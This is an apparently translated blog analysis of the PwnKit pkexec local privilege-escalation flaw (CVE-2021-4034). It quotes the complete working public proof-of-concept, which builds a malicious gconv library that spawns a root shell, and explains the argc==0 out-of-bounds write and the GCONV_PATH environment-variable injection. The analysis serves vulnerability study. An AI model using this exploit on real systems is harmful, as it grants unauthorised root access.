<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">➜ uname -a</span><br><span class="line">Linux ubuntu 5.11.0-46-generic <span class="comment">#51~20.04.1-Ubuntu SMP Fri Jan 7 06:51:40 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux</span></span><br><span class="line">~ </span><br><span class="line">➜ lsb_release -a</span><br><span class="line">No LSB modules are available.</span><br><span class="line">Distributor ID: Ubuntu</span><br><span class="line">Description: Ubuntu 20.04.3 LTS</span><br><span class="line">Release: 20.04</span><br><span class="line">Codename: focal</span><br><span class="line">➜ gcc --version</span><br><span class="line">gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0</span><br><span class="line">Copyright (C) 2019 Free Software Foundation, Inc.</span><br><span class="line">This is free software; see the <span class="built_in">source</span> <span class="keyword">for</span> copying conditions. There is NO</span><br><span class="line">warranty; not even <span class="keyword">for</span> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</span><br><span class="line">➜ pkexec --version</span><br><span class="line">pkexec version 0.105</span><br></pre></td></tr></table></figure>
<h2 id="0x02-漏洞分析"><a href="#0x02-漏洞分析" class="headerlink" title="0x02 漏洞分析"></a>0x02 Vulnerability Analysis</h2><p>The analysis below draws on the public <a href="https://github.com/arthepsy/CVE-2021-4034" target="_blank" rel="noopener">POC</a> and on Qualys's <a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034" target="_blank" rel="noopener">advisory</a>.</p>
<h3 id="分析-POC"><a href="#分析-POC" class="headerlink" title="分析 POC"></a>Analyzing the POC</h3><p>Let's start with the POC:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"> <span class="number">2</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"> <span class="number">3</span> <span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"> <span class="number">4</span> </span><br><span class="line"> <span class="number">5</span> <span class="keyword">char</span> *shell =</span><br><span class="line"> <span class="number">6</span> <span class="string">"#include <stdio.h>\n"</span></span><br><span class="line"> <span class="number">7</span> <span class="string">"#include <stdlib.h>\n"</span></span><br><span class="line"> <span class="number">8</span> <span class="string">"#include <unistd.h>\n\n"</span></span><br><span class="line"> <span 
class="number">9</span> <span class="string">"void gconv() {}\n"</span></span><br><span class="line"><span class="number">10</span> <span class="string">"void gconv_init() {\n"</span></span><br><span class="line"><span class="number">11</span> <span class="string">" setuid(0); setgid(0);\n"</span></span><br><span class="line"><span class="number">12</span> <span class="string">" seteuid(0); setegid(0);\n"</span></span><br><span class="line"><span class="number">13</span> <span class="string">" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"</span></span><br><span class="line"><span class="number">14</span> <span class="string">" exit(0);\n"</span></span><br><span class="line"><span class="number">15</span> <span class="string">"}"</span>;</span><br><span class="line"><span class="number">16</span> </span><br><span class="line"><span class="number">17</span> <span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"><span class="number">18</span> FILE *fp;</span><br><span class="line"><span class="number">19</span> system(<span class="string">"mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"</span>);</span><br><span class="line"><span class="number">20</span> system(<span class="string">"mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"</span>);</span><br><span class="line"><span class="number">21</span> fp = fopen(<span class="string">"pwnkit/pwnkit.c"</span>, <span class="string">"w"</span>);</span><br><span class="line"><span class="number">22</span> <span class="built_in">fprintf</span>(fp, <span class="string">"%s"</span>, shell);</span><br><span class="line"><span class="number">23</span> fclose(fp); </span><br><span class="line"><span 
class="number">24</span> system(<span class="string">"gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"</span>);</span><br><span class="line"><span class="number">25</span> <span class="keyword">char</span> *env[] = { <span class="string">"pwnkit"</span>, <span class="string">"PATH=GCONV_PATH=."</span>, <span class="string">"CHARSET=PWNKIT"</span>, <span class="string">"SHELL=pwnkit"</span>, <span class="literal">NULL</span> };</span><br><span class="line"><span class="number">26</span> execve(<span class="string">"/usr/bin/pkexec"</span>, (<span class="keyword">char</span>*[]){<span class="literal">NULL</span>}, env);</span><br><span class="line"><span class="number">27</span> }</span><br></pre></td></tr></table></figure>
<p>In this POC:</p>
<ol>
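<li>L5-L15: the payload, C source for a shared library whose <code>gconv_init()</code> sets its user and group IDs to 0, resets <code>PATH</code>, deletes the helper files and starts <code>/bin/sh</code> with root privileges</li>
<li>L19: creates the directory <code>GCONV_PATH=.</code> and the file <code>GCONV_PATH=./pwnkit</code>, and makes that file executable</li>
<li>L20: creates the directory <code>pwnkit</code> and the file <code>pwnkit/gconv-modules</code>, writing <code>module UTF-8// PWNKIT// pwnkit 2</code> into it</li>
<li>L21-L24: writes the payload to <code>pwnkit/pwnkit.c</code> and compiles it into the shared library <code>pwnkit/pwnkit.so</code></li>
<li>L25: a specially crafted array <code>env</code>, which becomes pkexec's environment</li>
<li>L26: runs <code>pkexec</code> via <code>execve</code>, passing the unusual argument vector <code>(char*[]){NULL}</code>; this is the <strong>trigger</strong> of the whole POC</li>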
</ol>
<p>Running the POC:</p>
<p><a href="https://imgtu.com/i/7X2QxO" target="_blank" rel="noopener"><img src="https://s4.ax1x.com/2022/01/27/7X2QxO.png" alt="7X2QxO.png"></a></p>
<h3 id="奇妙的-argc-为-0"><a href="#奇妙的-argc-为-0" class="headerlink" title="奇妙的 argc 为 0"></a>The curious case of argc == 0</h3><p>Everyone knows argc and argv, but a quick recap will help with the analysis that follows:</p>
<ul>
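<li>argc: short for argument count, the number of arguments passed to main at run time.</li>
<li>argv: short for argument vector, the arguments passed to main. It is an array of character pointers, each pointing to one command-line argument. For example:<ul>
<li>argv[0] conventionally points to the program name as it was invoked (e.g. <code>./t</code>), not necessarily its full path;</li>
<li>argv[1] points to the first string after the program name on the command line;</li>
<li>argv[argc] is a NULL pointer that terminates the array.</li>
</ul>
</li>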
</ul>
<p>The following code demonstrates argc and argv:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//t.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span></span>{</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"argc:%d\n"</span>,argc);</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<=argc;i++){</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"argv[%d]:%s\n"</span>,i,argv[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">➜ gcc t.c -o t</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./t</span><br><span class="line">argc:<span class="number">1</span></span><br><span 
class="line">argv[<span class="number">0</span>]:./t</span><br><span class="line">argv[<span class="number">1</span>]:(null)</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./t -l</span><br><span class="line">argc:<span class="number">2</span></span><br><span class="line">argv[<span class="number">0</span>]:./t</span><br><span class="line">argv[<span class="number">1</span>]:-l</span><br><span class="line">argv[<span class="number">2</span>]:(null)</span><br></pre></td></tr></table></figure>
<h4 id="execve"><a href="#execve" class="headerlink" title="execve()"></a>execve()</h4><p><a href="https://man7.org/linux/man-pages/man2/execve.2.html" target="_blank" rel="noopener">execve()</a> executes a program. It is declared in the <code>unistd.h</code> header, with the following prototype:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">execve</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span> *pathname, <span class="keyword">char</span> *<span class="keyword">const</span> argv[],</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">char</span> *<span class="keyword">const</span> envp[])</span></span>;</span><br></pre></td></tr></table></figure>
<p>Let's use the <code>t.c</code> program from above to get familiar with <code>execve()</code>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//ex.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span></span>{</span><br><span class="line"> <span class="keyword">char</span> *args[]={<span class="string">"./t"</span>,<span class="string">"-l"</span>,<span class="literal">NULL</span>};</span><br><span class="line"> <span class="keyword">char</span> *enp[]={<span class="number">0</span>,<span class="literal">NULL</span>};</span><br><span class="line"> execve(<span class="string">"./t"</span>,args,enp);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">➜ vim ex.c</span><br><span class="line">~/t2 took <span class="number">24</span>s 
</span><br><span class="line">➜ gcc ex.c -o ex</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./ex </span><br><span class="line">argc:<span class="number">2</span></span><br><span class="line">argv[<span class="number">0</span>]:./t</span><br><span class="line">argv[<span class="number">1</span>]:-l</span><br><span class="line">argv[<span class="number">2</span>]:(null)</span><br></pre></td></tr></table></figure>
<p>L26 of the POC above calls <code>execve()</code>:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">25</span> <span class="keyword">char</span> *env[] = { <span class="string">"pwnkit"</span>, <span class="string">"PATH=GCONV_PATH=."</span>, <span class="string">"CHARSET=PWNKIT"</span>, <span class="string">"SHELL=pwnkit"</span>, <span class="literal">NULL</span> };</span><br><span class="line"><span class="number">26</span> execve(<span class="string">"/usr/bin/pkexec"</span>, (<span class="keyword">char</span>*[]){<span class="literal">NULL</span>}, env);</span><br></pre></td></tr></table></figure>
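<p>The arguments, however, differ from our test: <strong>the second argument is <code>(char*[]){NULL}</code></strong>, an argument vector whose only element is the terminating NULL. Let's see what that does:</p>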
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//ex.c</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span></span>{</span><br><span class="line"> <span class="comment">//char *args[]={"./t","-l",NULL};</span></span><br><span class="line"> <span class="keyword">char</span> *enp[]={<span class="number">0</span>,<span class="literal">NULL</span>};</span><br><span class="line"> execve(<span class="string">"./t"</span>,(<span class="keyword">char</span>*[]){<span class="literal">NULL</span>},enp);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">~/t2 </span><br><span class="line">➜ vim ex.c</span><br><span class="line">~/t2 took <span class="number">31</span>s 
</span><br><span class="line">➜ gcc ex.c -o ex</span><br><span class="line">~/t2 </span><br><span class="line">➜ ./ex </span><br><span class="line">argc:<span class="number">0</span></span><br><span class="line">argv[<span class="number">0</span>]:(null)</span><br></pre></td></tr></table></figure>
<p>This time argc is 0, and argv[0] is NULL instead of the program name. Why does that matter? A great deal, as it turns out.</p>
<h3 id="pkexec-中的越界读取"><a href="#pkexec-中的越界读取" class="headerlink" title="pkexec 中的越界读取"></a>Out-of-bounds read and write in pkexec</h3><p>Now let's look at pkexec's code. The relevant parts of its main() function are:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">435</span> main (<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span><br><span class="line"><span class="number">436</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">534</span> <span class="keyword">for</span> (n = <span class="number">1</span>; n < (guint) argc; n++)</span><br><span class="line"><span class="number">535</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">568</span> }</span><br><span class="line">...</span><br><span class="line"><span class="number">610</span> path = g_strdup (argv[n]);</span><br><span class="line">...</span><br><span class="line"><span class="number">629</span> <span class="keyword">if</span> (path[<span class="number">0</span>] != <span class="string">'/'</span>)</span><br><span class="line"><span class="number">630</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">632</span> s = g_find_program_in_path (path);</span><br><span class="line">...</span><br><span class="line"><span class="number">639</span> argv[n] = path = s;</span><br><span class="line"><span class="number">640</span> }</span><br></pre></td></tr></table></figure>
<p>The code uses two GLib functions, <a href="https://www.manpagez.com/html/glib/glib-2.56.0/glib-String-Utility-Functions.php#g-strdup" target="_blank" rel="noopener">g_strdup()</a> and <a href="https://docs.gtk.org/glib/func.find_program_in_path.html" target="_blank" rel="noopener">g_find_program_in_path()</a>. Let's look at them first:</p>
<blockquote>
<ul>
<li><code>g_strdup()</code> duplicates a string, returning a newly allocated copy. Declaration:<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gchar *</span><br><span class="line">g_strdup (<span class="keyword">const</span> gchar *str);</span><br></pre></td></tr></table></figure></li>
<li><code>g_find_program_in_path()</code> locates the first executable named <code>program</code> in the user's path, in the same way that <code>execvp()</code> would locate it. It returns an allocated string with the absolute path name, or NULL if the program is not found in the path. If <code>program</code> is already an absolute path, it returns a copy of <code>program</code> if that file exists and is executable, and NULL otherwise. Declaration:<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gchar*</span><br><span class="line">g_find_program_in_path (</span><br><span class="line"> <span class="keyword">const</span> gchar* program</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
</li>
</ul>
</blockquote>
<p>Back in main():</p>
<ul>
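<li>L534-L568: command-line option processing<ul>
<li>L534: n starts at 1, so when argc is 1 (e.g. a bare <code>pkexec</code>) the loop body never runs; the loop is entered only when argc &gt; 1 (e.g. <code>pkexec --version</code>)</li>
</ul>
</li>
<li>L610-L640: if the program's path is not absolute, search for it in PATH<ul>
<li>L610: <code>g_strdup()</code> copies <code>argv[n]</code> into <code>path</code>; here <code>argv[n]</code> is the program pkexec is asked to run, e.g. <code>reboot</code> in <code>pkexec reboot</code></li>
<li>L629: checks whether the path is absolute with the simple test <code>path[0] != '/'</code></li>
<li>L632: searches PATH for the program and returns its full path</li>
<li>L639: assigns the returned path to both <code>path</code> and <code>argv[n]</code></li>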
</ul>
</li>
</ul>
<p>Under normal circumstances this logic is fine.<br>But if argc is 0, things go wrong:</p>
<ul>
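<li>L534: n is set to 1 and stays there, because the loop condition <code>1 &lt; 0</code> is false;</li>
<li>L610: <code>argv[1]</code> is read out of bounds, and the value read is copied into <code>path</code>;</li>
<li>L639: the pointer s is written out of bounds into <code>argv[1]</code>.</li>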
</ul>
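<p>The question is: what exactly is read from, and written to, this out-of-bounds <code>argv[1]</code>?</p>
<p>To answer that, we need to know how the arguments are laid out in memory, so let's look at the kernel code:</p>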
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// linux5.4/fs/binfmt_elf.c:</span></span><br><span class="line"><span class="number">163</span> <span class="keyword">static</span> <span class="keyword">int</span></span><br><span class="line"><span class="number">164</span> create_elf_tables(struct linux_binprm *bprm, struct elfhdr *exec,</span><br><span class="line"><span 
class="number">165</span> <span class="keyword">unsigned</span> <span class="keyword">long</span> load_addr, <span class="keyword">unsigned</span> <span class="keyword">long</span> interp_load_addr)</span><br><span class="line"><span class="number">166</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">284</span> sp = STACK_ADD(p, ei_index);</span><br><span class="line">...</span><br><span class="line"> <span class="comment">// lay out the stack for main()</span></span><br><span class="line"><span class="number">306</span> <span class="comment">/* Now, let's put argc (and argv, envp if appropriate) on the stack */</span></span><br><span class="line"> <span class="comment">// write argc</span></span><br><span class="line"><span class="number">307</span> <span class="keyword">if</span> (__put_user(argc, sp++))</span><br><span class="line"><span class="number">308</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">309</span></span><br><span class="line"> <span class="comment">// write the argv pointers</span></span><br><span
class="line"><span class="number">310</span> <span class="comment">/* Populate list of argv pointers back to argv strings. */</span></span><br><span class="line"><span class="number">311</span> p = current->mm->arg_end = current->mm->arg_start;</span><br><span class="line"><span class="number">312</span> <span class="keyword">while</span> (argc-- > <span class="number">0</span>) {</span><br><span class="line"><span class="number">313</span> <span class="keyword">size_t</span> len;</span><br><span class="line"><span class="number">314</span> <span class="keyword">if</span> (__put_user((<span class="keyword">elf_addr_t</span>)p, sp++))</span><br><span class="line"><span class="number">315</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">316</span> len = strnlen_user((<span class="keyword">void</span> __user *)p, MAX_ARG_STRLEN);</span><br><span class="line"><span class="number">317</span> <span class="keyword">if</span> (!len || len > MAX_ARG_STRLEN)</span><br><span class="line"><span class="number">318</span> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"><span class="number">319</span> p += len;</span><br><span class="line"><span class="number">320</span> }</span><br><span class="line"> <span class="comment">// write the NULL that terminates argv</span></span><br><span class="line"><span class="number">321</span> <span class="keyword">if</span> (__put_user(<span class="number">0</span>, sp++))</span><br><span class="line"><span class="number">322</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">323</span> current->mm->arg_end = p;</span><br><span class="line"><span class="number">324</span></span><br><span class="line"> <span class="comment">// write the envp pointers</span></span><br><span
class="line"><span class="number">325</span> <span class="comment">/* Populate list of envp pointers back to envp strings. */</span></span><br><span class="line"><span class="number">326</span> current->mm->env_end = current->mm->env_start = p;</span><br><span class="line"><span class="number">327</span> <span class="keyword">while</span> (envc-- > <span class="number">0</span>) {</span><br><span class="line"><span class="number">328</span> <span class="keyword">size_t</span> len;</span><br><span class="line"><span class="number">329</span> <span class="keyword">if</span> (__put_user((<span class="keyword">elf_addr_t</span>)p, sp++))</span><br><span class="line"><span class="number">330</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line"><span class="number">331</span> len = strnlen_user((<span class="keyword">void</span> __user *)p, MAX_ARG_STRLEN);</span><br><span class="line"><span class="number">332</span> <span class="keyword">if</span> (!len || len > MAX_ARG_STRLEN)</span><br><span class="line"><span class="number">333</span> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"><span class="number">334</span> p += len;</span><br><span class="line"><span class="number">335</span> }</span><br><span class="line"> <span class="comment">// write the NULL that terminates envp</span></span><br><span class="line"><span class="number">336</span> <span class="keyword">if</span> (__put_user(<span class="number">0</span>, sp++))</span><br><span class="line"><span class="number">337</span> <span class="keyword">return</span> -EFAULT;</span><br><span class="line">...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
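<p>As the code shows, when a new program is started with execve(), the kernel copies the argument and environment strings, together with the pointer arrays argv and envp, to the end of the new program's stack. main()'s arguments are laid out on the stack: argc is written first (L307), then the argv pointers and their terminating NULL (L310-L321), immediately followed by the envp pointers and their terminating NULL (L325-L336).<br>Simplified, the layout looks like this:</p>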
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">|---------+---------+-----+------------|---------+---------+-----+------------|</span><br><span class="line">| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |</span><br><span class="line">|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|</span><br><span class="line"> V V V V V V</span><br><span class="line"> "program" "-option" NULL "value" "PATH=name" NULL</span><br></pre></td></tr></table></figure>
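<p>The argv and envp pointer arrays are contiguous in memory. If argc is 0, argv[0] is already the NULL that terminates argv, so the out-of-bounds <code>argv[1]</code> is actually <code>envp[0]</code>: the pointer to the first environment string, <code>value</code>.</p>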
<p>Now that we know what argv[1] is, let's return to pkexec's main():</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">435</span> main (<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span><br><span class="line"><span class="number">436</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">534</span> <span class="keyword">for</span> (n = <span class="number">1</span>; n < (guint) argc; n++)</span><br><span class="line"><span class="number">535</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">568</span> }</span><br><span class="line">...</span><br><span class="line"><span class="number">610</span> path = g_strdup (argv[n]);</span><br><span class="line">...</span><br><span class="line"><span class="number">629</span> <span class="keyword">if</span> (path[<span class="number">0</span>] != <span class="string">'/'</span>)</span><br><span class="line"><span class="number">630</span> {</span><br><span class="line">...</span><br><span class="line"><span class="number">632</span> s = g_find_program_in_path (path);</span><br><span class="line">...</span><br><span class="line"><span class="number">639</span> argv[n] = path = s;</span><br><span class="line"><span class="number">640</span> }</span><br></pre></td></tr></table></figure>
<ul>
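<li>L610: the path of the program to run is read out of bounds from argv[1] (i.e. <code>envp[0]</code>) and points to <code>value</code></li>
<li>L632: this path, <code>value</code>, is passed to <code>g_find_program_in_path()</code></li>
<li><code>g_find_program_in_path()</code> searches the directories listed in the PATH environment variable for an executable named <code>value</code></li>
<li>if such an executable is found, its full path is returned to pkexec's main() (L632)</li>
<li>finally, at L639, this full path is written out of bounds into argv[1] (i.e. <code>envp[0]</code>), overwriting the first environment variable.</li>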
</ul>
<p>So whoever controls the string returned by <code>g_find_program_in_path</code> can inject an environment variable of their choosing.</p>
<p>Qualys <a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034" target="_blank" rel="noopener">points out</a> that if the PATH environment variable is <code>PATH=name</code>, and the directory <code>name</code> exists (in the current working directory) and contains an executable file named <code>value</code>, then a pointer to the string <code>name/value</code> is written out of bounds to <code>envp[0]</code>.</p>
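<p>Going one step further, make that combined file name contain an equals sign. Pass <code>PATH=name=.</code>, create a directory named <code>name=.</code>, and put an executable file <code>value</code> in it: <code>envp[0]</code> then becomes <code>name=./value</code>, which injects a new environment variable <code>name</code>. In the POC, <code>value</code> is <code>pwnkit</code> (the first entry of <code>env</code>) and PATH is <code>GCONV_PATH=.</code>, so <code>envp[0]</code> becomes <code>GCONV_PATH=./pwnkit</code>.</p>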
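<p>In other words, this out-of-bounds write bypasses the existing safeguards and reintroduces "unsecure" environment variables (for example, <code>LD_PRELOAD</code>) into pkexec's environment. Such variables are normally removed by the dynamic linker (ld.so) from the environment of set-user-ID programs before <code>main()</code> is even called.</p>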
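<h3 id="寻找不安全的环境变量"><a href="#寻找不安全的环境变量" class="headerlink" title="寻找不安全的环境变量"></a>Finding an unsafe environment variable</h3><p>The next question: to exploit this bug, which unsafe variable should we reintroduce into pkexec's environment? Our options are limited, because shortly after the out-of-bounds write (L639), pkexec clears its environment completely (L702):</p>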
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">639</span> argv[n] = path = s;</span><br><span class="line">...</span><br><span class="line"><span class="number">657</span> <span class="keyword">for</span> (n = <span class="number">0</span>; environment_variables_to_save[n] != <span class="literal">NULL</span>; n++)</span><br><span class="line"><span class="number">658</span> {</span><br><span class="line"><span class="number">659</span> <span class="keyword">const</span> gchar *key = environment_variables_to_save[n];</span><br><span class="line">...</span><br><span class="line"><span class="number">662</span> value = g_getenv (key);</span><br><span class="line">...</span><br><span class="line"><span class="number">670</span> <span class="keyword">if</span> (!validate_environment_variable (key, value))</span><br><span class="line">...</span><br><span class="line"><span class="number">675</span> }</span><br><span class="line">...</span><br><span class="line"><span class="number">702</span> <span class="keyword">if</span> (clearenv () != <span class="number">0</span>)</span><br></pre></td></tr></table></figure>
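<p>The answer lies in pkexec's complexity: to print error messages to stderr, pkexec calls GLib's function <code>g_printerr()</code> (note: GLib is a GNOME library, not the GNU C library, glibc). For example, the functions <code>validate_environment_variable()</code> and <code>log_message()</code> call <code>g_printerr()</code> (L126, L408-L409), and <code>validate_environment_variable()</code> runs at L670, that is, before <code>clearenv()</code>:</p>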
